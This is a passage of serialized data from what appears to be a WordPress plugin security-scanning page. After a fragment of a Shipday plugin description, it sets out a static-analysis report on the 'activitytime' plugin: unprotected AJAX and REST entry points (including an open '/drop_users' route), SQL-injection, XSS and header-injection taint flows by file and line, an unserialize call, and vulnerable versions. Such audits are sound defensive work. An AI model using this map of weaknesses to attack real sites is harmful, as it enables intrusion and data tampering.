driver tracking and route optimization\u003C\u002Fli>\n\u003Cli>Automated dispatch and delivery scheduling\u003C\u002Fli>\n\u003Cli>Branded live tracking links for customers\u003C\u002Fli>\n\u003Cli>Powerful yet easy-to-use web and mobile apps\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Whether you’re running your own in-house delivery operation or a third-party courier service for other businesses, this plugin connects WooCommerce with Shipday so you can manage everything from one place.\u003C\u002Fp>\n\u003Cp>If you need assistance or have any questions, contact us at \u003Ca href=\"mailto:support@shipday.com\" rel=\"nofollow ugc\">support@shipday.com\u003C\u002Fa>. You can also read our \u003Ca href=\"https:\u002F\u002Fwww.shipday.com\u002Fterms\" rel=\"nofollow ugc\">terms of use\u003C\u002Fa>.\u003C\u002Fp>\n","Shipday adds local delivery and pickup workflows, dispatch sync, and checkout date\u002Ftime selection to WooCommerce.",900,42261,84,"2026-03-26T08:26:00.000Z","5.8",[240,241,242,243,244],"datetime-picker","delivery-tracking","driver-app","local-delivery","woocommerce-delivery","https:\u002F\u002Fwww.shipday.com\u002Fwoocommerce","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fshipday-for-woocommerce.2.3.1.zip",{"attackSurface":248,"codeSignals":331,"taintFlows":691,"riskAssessment":814,"analyzedAt":839},{"hooks":249,"ajaxHandlers":301,"restRoutes":311,"shortcodes":324,"cronEvents":329,"entryPointCount":330,"unprotectedCount":28},[250,255,258,263,266,268,271,274,276,279,282,285,288,290,292,294,298],{"type":251,"name":252,"callback":253,"file":254,"line":100},"action","rest_api_init","closure","activitytime-api.php",{"type":251,"name":256,"callback":253,"file":78,"line":257},"after_setup_theme",131,{"type":251,"name":259,"callback":260,"file":261,"line":262},"plugins_loaded","anonymous","includes\\class-activitytime.php",163,{"type":251,"name":264,"callback":260,"file":261,"line":265},"admin_enqueue_scripts",178,{"type":251,"name":264,"callback":260,"file":261,"line":267},179,{"type":251,"name":269,"callback":260,"file":261,"line":270},"admin_menu",184,{"type":251,"name":272,"callback":260,"file":261,"line":273},"wp_enqueue_scripts",203,{"type":251,"name":272,"callback":260,"file":261,"line":275},204,{"type":251,"name":259,"callback":277,"file":261,"line":278},"Activitytime_Activator",252,{"type":251,"name":280,"callback":260,"file":261,"line":281},"wp_loaded",292,{"type":251,"name":283,"callback":260,"file":261,"line":284},"wp_head",294,{"type":251,"name":286,"callback":260,"file":261,"line":287},"admin_head",295,{"type":251,"name":283,"callback":260,"file":261,"line":289},297,{"type":251,"name":286,"callback":260,"file":261,"line":291},298,{"type":251,"name":252,"callback":253,"file":261,"line":293},301,{"type":251,"name":295,"callback":296,"file":261,"line":297},"admin_footer","plg_name_show_debug_queries",377,{"type":251,"name":299,"callback":296,"file":261,"line":300},"wp_footer",378,[302,306,308],{"action":303,"nopriv":304,"callback":260,"hasNonce":51,"hasCapCheck":51,"file":261,"line":305},"activitytime_action",true,254,{"action":303,"nopriv":51,"callback":260,"hasNonce":51,"hasCapCheck":51,"file":261,"line":307},260,{"action":309,"nopriv":51,"callback":260,"hasNonce":51,"hasCapCheck":51,"file":261,"line":310},"activitytime_mvc_action",266,[312,319],{"namespace":313,"route":314,"methods":315,"callback":317,"permissionCallback":318,"file":254,"line":28},"acct_api\u002Fv2","\u002Fdrop_users",[316],"POST","acct_api_drop_users","__return_true",{"namespace":320,"route":321,"methods":322,"callback":303,"permissionCallback":39,"file":261,"line":323},"activitytime\u002Fv1","\u002Faction",[316],302,[325],{"tag":326,"callback":327,"file":328,"line":52},"actt_time_page","register_actt_time_page_shortcode","shortcodes\\actt_time_page.php",[],6,{"dangerousFunctions":332,"sqlUsage":338,"outputEscaping":340,"fileOperations":29,"externalRequests":217,"nonceChecks":29,"capabilityChecks":217,"bundledLibraries":680},[333],{"fn":334,"file":335,"line":336,"context":337},"unserialize","application\\controllers\\Actt_current_active.php",316,"'filter_par'=> json_encode(unserialize($filter['filter_par']))",{"prepared":150,"raw":29,"locations":339},[],{"escaped":341,"rawEcho":342,"locations":343},191,216,[344,346,349,351,353,355,357,358,360,362,365,367,369,372,374,376,379,381,383,386,388,390,393,395,398,400,401,403,405,407,409,411,413,415,417,419,421,423,425,427,429,431,434,436,437,439,440,442,444,446,447,448,450,452,454,456,458,460,461,463,464,465,467,468,470,472,473,475,476,478,480,482,484,485,486,487,489,491,493,495,496,497,499,501,502,504,505,506,507,509,511,512,514,516,518,520,522,524,526,528,530,532,534,536,538,539,540,541,543,545,546,547,548,549,550,551,552,553,554,555,556,557,558,560,561,563,565,567,569,570,571,572,573,574,575,577,578,579,580,581,582,583,584,585,587,588,589,590,592,593,595,597,598,599,600,602,604,606,607,608,609,610,611,612,613,614,615,616,617,618,619,620,621,623,624,626,628,630,631,633,635,636,637,638,639,640,641,642,643,644,645,646,647,648,649,650,651,652,654,655,656,658,660,661,663,664,665,666,668,669,670,671,673,675,676,678],{"file":78,"line":341,"context":345},"raw output",{"file":347,"line":348,"context":345},"application\\controllers\\Activitytime.php",221,{"file":347,"line":350,"context":345},270,{"file":335,"line":352,"context":345},104,{"file":335,"line":354,"context":345},126,{"file":335,"line":356,"context":345},258,{"file":335,"line":287,"context":345},{"file":335,"line":359,"context":345},330,{"file":335,"line":361,"context":345},358,{"file":363,"line":364,"context":345},"application\\controllers\\Actt_sessions.php",120,{"file":363,"line":366,"context":345},142,{"file":363,"line":368,"context":345},307,{"file":370,"line":371,"context":345},"application\\controllers\\Actt_time_by_postacc.php",165,{"file":370,"line":373,"context":345},187,{"file":370,"line":375,"context":345},352,{"file":377,"line":378,"context":345},"application\\controllers\\Actt_time_per_page.php",123,{"file":377,"line":380,"context":345},145,{"file":377,"line":382,"context":345},317,{"file":384,"line":385,"context":345},"application\\controllers\\Actt_time_per_pageacc.php",136,{"file":384,"line":387,"context":345},158,{"file":384,"line":389,"context":345},332,{"file":391,"line":392,"context":345},"application\\core\\MY_Model.php",207,{"file":391,"line":394,"context":345},255,{"file":396,"line":397,"context":345},"application\\views\\acct_contact\\index.php",22,{"file":396,"line":399,"context":345},32,{"file":396,"line":192,"context":345},{"file":396,"line":402,"context":345},36,{"file":396,"line":404,"context":345},37,{"file":396,"line":406,"context":345},40,{"file":396,"line":408,"context":345},42,{"file":396,"line":410,"context":345},43,{"file":396,"line":412,"context":345},44,{"file":396,"line":414,"context":345},45,{"file":396,"line":416,"context":345},46,{"file":396,"line":418,"context":345},50,{"file":396,"line":420,"context":345},52,{"file":396,"line":422,"context":345},53,{"file":396,"line":424,"context":345},57,{"file":396,"line":426,"context":345},61,{"file":396,"line":428,"context":345},65,{"file":396,"line":430,"context":345},68,{"file":432,"line":433,"context":345},"application\\views\\acct_shortcodes\\actt_time_page.php",18,{"file":432,"line":435,"context":345},19,{"file":432,"line":150,"context":345},{"file":432,"line":438,"context":345},21,{"file":432,"line":412,"context":345},{"file":441,"line":28,"context":345},"application\\views\\activitytime\\index.php",{"file":441,"line":443,"context":345},8,{"file":441,"line":445,"context":345},9,{"file":441,"line":116,"context":345},{"file":441,"line":48,"context":345},{"file":441,"line":449,"context":345},12,{"file":441,"line":451,"context":345},13,{"file":441,"line":453,"context":345},15,{"file":441,"line":455,"context":345},17,{"file":441,"line":457,"context":345},29,{"file":441,"line":459,"context":345},30,{"file":441,"line":459,"context":345},{"file":441,"line":462,"context":345},35,{"file":441,"line":412,"context":345},{"file":441,"line":414,"context":345},{"file":441,"line":466,"context":345},63,{"file":441,"line":430,"context":345},{"file":441,"line":469,"context":345},80,{"file":441,"line":471,"context":345},81,{"file":441,"line":471,"context":345},{"file":441,"line":474,"context":345},86,{"file":441,"line":137,"context":345},{"file":441,"line":477,"context":345},96,{"file":441,"line":479,"context":345},114,{"file":441,"line":481,"context":345},119,{"file":483,"line":28,"context":345},"application\\views\\actt_current_active\\index.php",{"file":483,"line":116,"context":345},{"file":483,"line":48,"context":345},{"file":483,"line":397,"context":345},{"file":483,"line":488,"context":345},23,{"file":483,"line":490,"context":345},24,{"file":483,"line":492,"context":345},25,{"file":483,"line":494,"context":345},26,{"file":483,"line":402,"context":345},{"file":483,"line":404,"context":345},{"file":483,"line":498,"context":345},38,{"file":483,"line":500,"context":345},39,{"file":483,"line":406,"context":345},{"file":483,"line":503,"context":345},41,{"file":483,"line":416,"context":345},{"file":483,"line":426,"context":345},{"file":483,"line":426,"context":345},{"file":483,"line":508,"context":345},62,{"file":483,"line":510,"context":345},98,{"file":483,"line":13,"context":345},{"file":483,"line":513,"context":345},108,{"file":483,"line":515,"context":345},143,{"file":483,"line":517,"context":345},455,{"file":483,"line":519,"context":345},469,{"file":483,"line":521,"context":345},475,{"file":483,"line":523,"context":345},491,{"file":483,"line":525,"context":345},499,{"file":483,"line":527,"context":345},503,{"file":483,"line":529,"context":345},504,{"file":483,"line":531,"context":345},509,{"file":483,"line":533,"context":345},529,{"file":483,"line":535,"context":345},536,{"file":537,"line":28,"context":345},"application\\views\\actt_related\\index.php",{"file":537,"line":116,"context":345},{"file":537,"line":492,"context":345},{"file":537,"line":492,"context":345},{"file":537,"line":542,"context":345},27,{"file":544,"line":28,"context":345},"application\\views\\actt_sessions\\index.php",{"file":544,"line":116,"context":345},{"file":544,"line":48,"context":345},{"file":544,"line":397,"context":345},{"file":544,"line":488,"context":345},{"file":544,"line":490,"context":345},{"file":544,"line":492,"context":345},{"file":544,"line":462,"context":345},{"file":544,"line":402,"context":345},{"file":544,"line":404,"context":345},{"file":544,"line":498,"context":345},{"file":544,"line":500,"context":345},{"file":544,"line":418,"context":345},{"file":544,"line":418,"context":345},{"file":544,"line":559,"context":345},51,{"file":544,"line":27,"context":345},{"file":544,"line":562,"context":345},89,{"file":544,"line":564,"context":345},97,{"file":544,"line":566,"context":345},133,{"file":568,"line":28,"context":345},"application\\views\\actt_time_by_post_pageacc\\index.php",{"file":568,"line":116,"context":345},{"file":568,"line":48,"context":345},{"file":568,"line":490,"context":345},{"file":568,"line":492,"context":345},{"file":568,"line":494,"context":345},{"file":568,"line":542,"context":345},{"file":568,"line":576,"context":345},28,{"file":568,"line":457,"context":345},{"file":568,"line":500,"context":345},{"file":568,"line":406,"context":345},{"file":568,"line":503,"context":345},{"file":568,"line":408,"context":345},{"file":568,"line":410,"context":345},{"file":568,"line":412,"context":345},{"file":568,"line":414,"context":345},{"file":568,"line":586,"context":345},59,{"file":568,"line":426,"context":345},{"file":568,"line":508,"context":345},{"file":568,"line":466,"context":345},{"file":568,"line":591,"context":345},64,{"file":568,"line":428,"context":345},{"file":568,"line":594,"context":345},66,{"file":568,"line":596,"context":345},74,{"file":568,"line":474,"context":345},{"file":568,"line":474,"context":345},{"file":568,"line":27,"context":345},{"file":568,"line":601,"context":345},154,{"file":568,"line":603,"context":345},226,{"file":605,"line":28,"context":345},"application\\views\\actt_time_per_page\\index.php",{"file":605,"line":116,"context":345},{"file":605,"line":48,"context":345},{"file":605,"line":397,"context":345},{"file":605,"line":488,"context":345},{"file":605,"line":490,"context":345},{"file":605,"line":492,"context":345},{"file":605,"line":494,"context":345},{"file":605,"line":542,"context":345},{"file":605,"line":404,"context":345},{"file":605,"line":498,"context":345},{"file":605,"line":500,"context":345},{"file":605,"line":406,"context":345},{"file":605,"line":503,"context":345},{"file":605,"line":408,"context":345},{"file":605,"line":410,"context":345},{"file":605,"line":622,"context":345},54,{"file":605,"line":622,"context":345},{"file":605,"line":625,"context":345},55,{"file":605,"line":627,"context":345},90,{"file":605,"line":629,"context":345},92,{"file":605,"line":13,"context":345},{"file":605,"line":632,"context":345},137,{"file":634,"line":28,"context":345},"application\\views\\actt_time_per_pageacc\\index.php",{"file":634,"line":116,"context":345},{"file":634,"line":438,"context":345},{"file":634,"line":397,"context":345},{"file":634,"line":488,"context":345},{"file":634,"line":490,"context":345},{"file":634,"line":492,"context":345},{"file":634,"line":494,"context":345},{"file":634,"line":462,"context":345},{"file":634,"line":402,"context":345},{"file":634,"line":404,"context":345},{"file":634,"line":498,"context":345},{"file":634,"line":500,"context":345},{"file":634,"line":406,"context":345},{"file":634,"line":503,"context":345},{"file":634,"line":559,"context":345},{"file":634,"line":559,"context":345},{"file":634,"line":420,"context":345},{"file":634,"line":653,"context":345},85,{"file":634,"line":27,"context":345},{"file":634,"line":564,"context":345},{"file":634,"line":657,"context":345},134,{"file":659,"line":28,"context":345},"application\\views\\actt_time_per_pageacc_add\\add_activity.php",{"file":659,"line":451,"context":345},{"file":659,"line":662,"context":345},14,{"file":659,"line":433,"context":345},{"file":659,"line":435,"context":345},{"file":659,"line":488,"context":345},{"file":659,"line":667,"context":345},31,{"file":659,"line":503,"context":345},{"file":659,"line":408,"context":345},{"file":659,"line":416,"context":345},{"file":261,"line":672,"context":345},333,{"file":261,"line":674,"context":345},337,{"file":261,"line":517,"context":345},{"file":261,"line":677,"context":345},460,{"file":261,"line":679,"context":345},467,[681,684,688],{"name":682,"version":39,"knownCves":683},"DataTables",[],{"name":685,"version":686,"knownCves":687},"Freemius","1.0",[],{"name":689,"version":39,"knownCves":690},"Select2",[],[692,708,716,724,732,744,766,778,786,803],{"entryPoint":693,"graph":694,"unsanitizedCount":29,"severity":707},"\u003Cindex> (application\\views\\actt_sessions\\index.php:0)",{"nodes":695,"edges":705},[696,700],{"id":697,"type":698,"label":699,"file":544,"line":402},"n0","source","$_GET",{"id":701,"type":702,"label":703,"file":544,"line":402,"wp_function":704},"n1","sink","echo() [XSS]","echo",[706],{"from":697,"to":701,"sanitized":304},"low",{"entryPoint":709,"graph":710,"unsanitizedCount":29,"severity":707},"\u003Cindex> (application\\views\\actt_time_by_post_pageacc\\index.php:0)",{"nodes":711,"edges":714},[712,713],{"id":697,"type":698,"label":699,"file":568,"line":503},{"id":701,"type":702,"label":703,"file":568,"line":503,"wp_function":704},[715],{"from":697,"to":701,"sanitized":304},{"entryPoint":717,"graph":718,"unsanitizedCount":29,"severity":707},"\u003Cindex> (application\\views\\actt_time_per_page\\index.php:0)",{"nodes":719,"edges":722},[720,721],{"id":697,"type":698,"label":699,"file":605,"line":500},{"id":701,"type":702,"label":703,"file":605,"line":500,"wp_function":704},[723],{"from":697,"to":701,"sanitized":304},{"entryPoint":725,"graph":726,"unsanitizedCount":29,"severity":707},"\u003Cindex> (application\\views\\actt_time_per_pageacc\\index.php:0)",{"nodes":727,"edges":730},[728,729],{"id":697,"type":698,"label":699,"file":634,"line":404},{"id":701,"type":702,"label":703,"file":634,"line":404,"wp_function":704},[731],{"from":697,"to":701,"sanitized":304},{"entryPoint":733,"graph":734,"unsanitizedCount":205,"severity":109},"index (application\\controllers\\Activitytime.php:10)",{"nodes":735,"edges":742},[736,738],{"id":697,"type":698,"label":737,"file":347,"line":406},"$_POST (x2)",{"id":701,"type":702,"label":739,"file":347,"line":740,"wp_function":741},"get_results() [SQLi]",49,"get_results",[743],{"from":697,"to":701,"sanitized":51},{"entryPoint":745,"graph":746,"unsanitizedCount":443,"severity":109},"\u003CActivitytime> (application\\controllers\\Activitytime.php:0)",{"nodes":747,"edges":762},[748,750,751,753,758,760],{"id":697,"type":698,"label":749,"file":347,"line":406},"$_POST (x4)",{"id":701,"type":702,"label":739,"file":347,"line":740,"wp_function":741},{"id":752,"type":698,"label":737,"file":347,"line":204},"n2",{"id":754,"type":702,"label":755,"file":347,"line":756,"wp_function":757},"n3","header() [Header Injection]",218,"header",{"id":759,"type":698,"label":737,"file":347,"line":204},"n4",{"id":761,"type":702,"label":703,"file":347,"line":348,"wp_function":704},"n5",[763,764,765],{"from":697,"to":701,"sanitized":51},{"from":752,"to":754,"sanitized":51},{"from":759,"to":761,"sanitized":51},{"entryPoint":767,"graph":768,"unsanitizedCount":217,"severity":109},"is_acct_is_activity_exists (application\\helpers\\Basic.php:12)",{"nodes":769,"edges":776},[770,773],{"id":697,"type":698,"label":771,"file":772,"line":492},"$_POST","application\\helpers\\Basic.php",{"id":701,"type":702,"label":774,"file":772,"line":542,"wp_function":775},"get_row() [SQLi]","get_row",[777],{"from":697,"to":701,"sanitized":51},{"entryPoint":779,"graph":780,"unsanitizedCount":217,"severity":109},"\u003CBasic> (application\\helpers\\Basic.php:0)",{"nodes":781,"edges":784},[782,783],{"id":697,"type":698,"label":771,"file":772,"line":492},{"id":701,"type":702,"label":774,"file":772,"line":542,"wp_function":775},[785],{"from":697,"to":701,"sanitized":51},{"entryPoint":787,"graph":788,"unsanitizedCount":100,"severity":109},"activitytime_action (includes\\class-activitytime.php:367)",{"nodes":789,"edges":800},[790,793,797,799],{"id":697,"type":698,"label":791,"file":261,"line":792},"$_POST (x3)",373,{"id":701,"type":702,"label":794,"file":261,"line":795,"wp_function":796},"query() [SQLi]",414,"query",{"id":752,"type":698,"label":798,"file":261,"line":679},"$_SERVER['REQUEST_TIME_FLOAT']",{"id":754,"type":702,"label":703,"file":261,"line":679,"wp_function":704},[801,802],{"from":697,"to":701,"sanitized":51},{"from":752,"to":754,"sanitized":51},{"entryPoint":804,"graph":805,"unsanitizedCount":100,"severity":109},"\u003Cclass-activitytime> (includes\\class-activitytime.php:0)",{"nodes":806,"edges":811},[807,808,809,810],{"id":697,"type":698,"label":791,"file":261,"line":792},{"id":701,"type":702,"label":794,"file":261,"line":795,"wp_function":796},{"id":752,"type":698,"label":798,"file":261,"line":679},{"id":754,"type":702,"label":703,"file":261,"line":679,"wp_function":704},[812,813],{"from":697,"to":701,"sanitized":51},{"from":752,"to":754,"sanitized":51},{"summary":815,"deductions":816},"The 'activitytime' plugin exhibits a concerning security posture due to a significant number of unprotected entry points and a history of critical vulnerabilities.  While the plugin utilizes prepared statements for all SQL queries, which is a strong security practice, this is overshadowed by the presence of 5 unprotected entry points (AJAX handlers and REST API routes). Furthermore, the static analysis reveals 6 high-severity taint flows with unsanitized paths, indicating a real risk of sensitive data exposure or manipulation. The 'unserialize' function also poses a potential risk if not handled with extreme care.\n\nThe plugin's vulnerability history is also a major red flag, with 3 known CVEs including a past critical vulnerability. The common types of vulnerabilities (XSS and SQL Injection) align with the identified taint flows and unprotected entry points, suggesting persistent weaknesses in input validation and sanitization. The absence of nonce checks on AJAX handlers and only one capability check across all entry points further exacerbates these risks, making it easier for attackers to exploit.\n\nIn conclusion, despite the good practice of using prepared statements for SQL, the 'activitytime' plugin has significant security weaknesses. The high number of unprotected entry points, the critical taint flows, and the historical vulnerability record point to a plugin that requires immediate attention and remediation to mitigate potential exploitation.",[817,819,821,823,825,827,829,831,833,835,837],{"reason":818,"points":116},"Unprotected AJAX handlers",{"reason":820,"points":116},"Unprotected REST API routes",{"reason":822,"points":449},"High severity taint flows",{"reason":824,"points":116},"Unsanitized paths in taint flows",{"reason":826,"points":443},"Dangerous unserialize function",{"reason":828,"points":116},"No nonce checks",{"reason":830,"points":28},"Low capability check coverage",{"reason":832,"points":52},"Bundled outdated Freemius v1.0",{"reason":834,"points":453},"Past critical vulnerability",{"reason":836,"points":449},"Past high severity vulnerability",{"reason":838,"points":443},"Past medium severity vulnerability","2026-03-16T19:31:30.272Z",{"wat":841,"direct":852},{"assetPaths":842,"generatorPatterns":846,"scriptPaths":847,"versionParams":848},[843,844,845],"\u002Fwp-content\u002Fplugins\u002Factivitytime\u002Fadmin\u002Fcss\u002Factivitytime-admin.css","\u002Fwp-content\u002Fplugins\u002Factivitytime\u002Fpublic\u002Fcss\u002Factivitytime-public.css","\u002Fwp-content\u002Fplugins\u002Factivitytime\u002Fpublic\u002Fjs\u002Factivitytime-public.js",[],[845],[849,850,851],"activitytime-admin.css?ver=","activitytime-public.css?ver=","activitytime-public.js?ver=",{"cssClasses":853,"htmlComments":860,"htmlAttributes":869,"restEndpoints":873,"jsGlobals":874,"shortcodeOutput":877},[854,855,856,857,858,859],"activitytime-admin-wrap","activity-time-widget","actt-progress-bar","actt-widget-row","activity-time-table-wrap","activitytime-content-wrapper",[861,862,863,864,865,866,867,868],"\u003C!-- Activitytime Admin Setting -->","\u003C!-- Activitytime Admin Setting END -->","\u003C!-- Activity time widget -->","\u003C!-- Activity time widget END -->","\u003C!-- Activity time Table -->","\u003C!-- Activity time Table END -->","\u003C!-- Activitytime public -->","\u003C!-- Activitytime public END -->",[870,871,872],"data-activitytime-post-id","data-activitytime-user-id","data-activitytime-post-type",[],[875,876],"activitytime_data","activitytime_admin_params",[878,879],"[activity_time_chart]","[activity_time_table]",{"error":304,"url":881,"statusCode":882,"statusMessage":883,"message":883},"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Factivitytime\u002Fbundle",404,"no bundle for this plugin yet",{"slug":4,"current_version":6,"total_versions":443,"versions":885},[886,893,902,910,920,929,939,951],{"version":67,"download_url":887,"svn_tag_url":888,"released_at":39,"has_diff":51,"diff_files_changed":889,"diff_lines":39,"trac_diff_url":890,"vulnerabilities":891,"is_current":51},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Factivitytime.1.1.4.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Factivitytime\u002Ftags\u002F1.1.4\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Factivitytime%2Ftags%2F1.1.3&new_path=%2Factivitytime%2Ftags%2F1.1.4",[892],{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":894,"download_url":895,"svn_tag_url":896,"released_at":39,"has_diff":51,"diff_files_changed":897,"diff_lines":39,"trac_diff_url":898,"vulnerabilities":899,"is_current":51},"1.1.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Factivitytime.1.1.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Factivitytime\u002Ftags\u002F1.1.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Factivitytime%2Ftags%2F1.1.2&new_path=%2Factivitytime%2Ftags%2F1.1.3",[900,901],{"id":62,"url_slug":63,"title":64,"severity":41,"cvss_score":68,"vuln_type":70,"patched_in_version":67},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":92,"download_url":903,"svn_tag_url":904,"released_at":39,"has_diff":51,"diff_files_changed":905,"diff_lines":39,"trac_diff_url":906,"vulnerabilities":907,"is_current":51},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Factivitytime.1.1.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Factivitytime\u002Ftags\u002F1.1.2\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Factivitytime%2Ftags%2F1.1.1&new_path=%2Factivitytime%2Ftags%2F1.1.2",[908,909],{"id":62,"url_slug":63,"title":64,"severity":41,"cvss_score":68,"vuln_type":70,"patched_in_version":67},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":911,"download_url":912,"svn_tag_url":913,"released_at":39,"has_diff":51,"diff_files_changed":914,"diff_lines":39,"trac_diff_url":915,"vulnerabilities":916,"is_current":51},"1.1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Factivitytime.1.1.1.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Factivitytime\u002Ftags\u002F1.1.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Factivitytime%2Ftags%2F1.1.0&new_path=%2Factivitytime%2Ftags%2F1.1.1",[917,918,919],{"id":62,"url_slug":63,"title":64,"severity":41,"cvss_score":68,"vuln_type":70,"patched_in_version":67},{"id":87,"url_slug":88,"title":89,"severity":41,"cvss_score":93,"vuln_type":95,"patched_in_version":92},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":108,"download_url":921,"svn_tag_url":922,"released_at":39,"has_diff":51,"diff_files_changed":923,"diff_lines":39,"trac_diff_url":924,"vulnerabilities":925,"is_current":51},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Factivitytime.1.1.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Factivitytime\u002Ftags\u002F1.1.0\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Factivitytime%2Ftags%2F1.0.9&new_path=%2Factivitytime%2Ftags%2F1.1.0",[926,927,928],{"id":62,"url_slug":63,"title":64,"severity":41,"cvss_score":68,"vuln_type":70,"patched_in_version":67},{"id":87,"url_slug":88,"title":89,"severity":41,"cvss_score":93,"vuln_type":95,"patched_in_version":92},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":124,"download_url":930,"svn_tag_url":931,"released_at":39,"has_diff":51,"diff_files_changed":932,"diff_lines":39,"trac_diff_url":933,"vulnerabilities":934,"is_current":51},"https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Factivitytime.1.0.9.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Factivitytime\u002Ftags\u002F1.0.9\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Factivitytime%2Ftags%2F1.0.8&new_path=%2Factivitytime%2Ftags%2F1.0.9",[935,936,937,938],{"id":103,"url_slug":104,"title":105,"severity":109,"cvss_score":110,"vuln_type":44,"patched_in_version":108},{"id":62,"url_slug":63,"title":64,"severity":41,"cvss_score":68,"vuln_type":70,"patched_in_version":67},{"id":87,"url_slug":88,"title":89,"severity":41,"cvss_score":93,"vuln_type":95,"patched_in_version":92},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":940,"download_url":941,"svn_tag_url":942,"released_at":39,"has_diff":51,"diff_files_changed":943,"diff_lines":39,"trac_diff_url":944,"vulnerabilities":945,"is_current":51},"1.0.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Factivitytime.1.0.8.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Factivitytime\u002Ftags\u002F1.0.8\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Factivitytime%2Ftags%2F1.0.7&new_path=%2Factivitytime%2Ftags%2F1.0.8",[946,947,948,949,950],{"id":103,"url_slug":104,"title":105,"severity":109,"cvss_score":110,"vuln_type":44,"patched_in_version":108},{"id":62,"url_slug":63,"title":64,"severity":41,"cvss_score":68,"vuln_type":70,"patched_in_version":67},{"id":119,"url_slug":120,"title":121,"severity":125,"cvss_score":126,"vuln_type":44,"patched_in_version":124},{"id":87,"url_slug":88,"title":89,"severity":41,"cvss_score":93,"vuln_type":95,"patched_in_version":92},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6},{"version":952,"download_url":953,"svn_tag_url":954,"released_at":39,"has_diff":51,"diff_files_changed":955,"diff_lines":39,"trac_diff_url":39,"vulnerabilities":956,"is_current":51},"1.0.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Factivitytime.1.0.7.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Factivitytime\u002Ftags\u002F1.0.7\u002F",[],[957,958,959,960,961],{"id":103,"url_slug":104,"title":105,"severity":109,"cvss_score":110,"vuln_type":44,"patched_in_version":108},{"id":62,"url_slug":63,"title":64,"severity":41,"cvss_score":68,"vuln_type":70,"patched_in_version":67},{"id":119,"url_slug":120,"title":121,"severity":125,"cvss_score":126,"vuln_type":44,"patched_in_version":124},{"id":87,"url_slug":88,"title":89,"severity":41,"cvss_score":93,"vuln_type":95,"patched_in_version":92},{"id":35,"url_slug":36,"title":37,"severity":41,"cvss_score":42,"vuln_type":44,"patched_in_version":6}]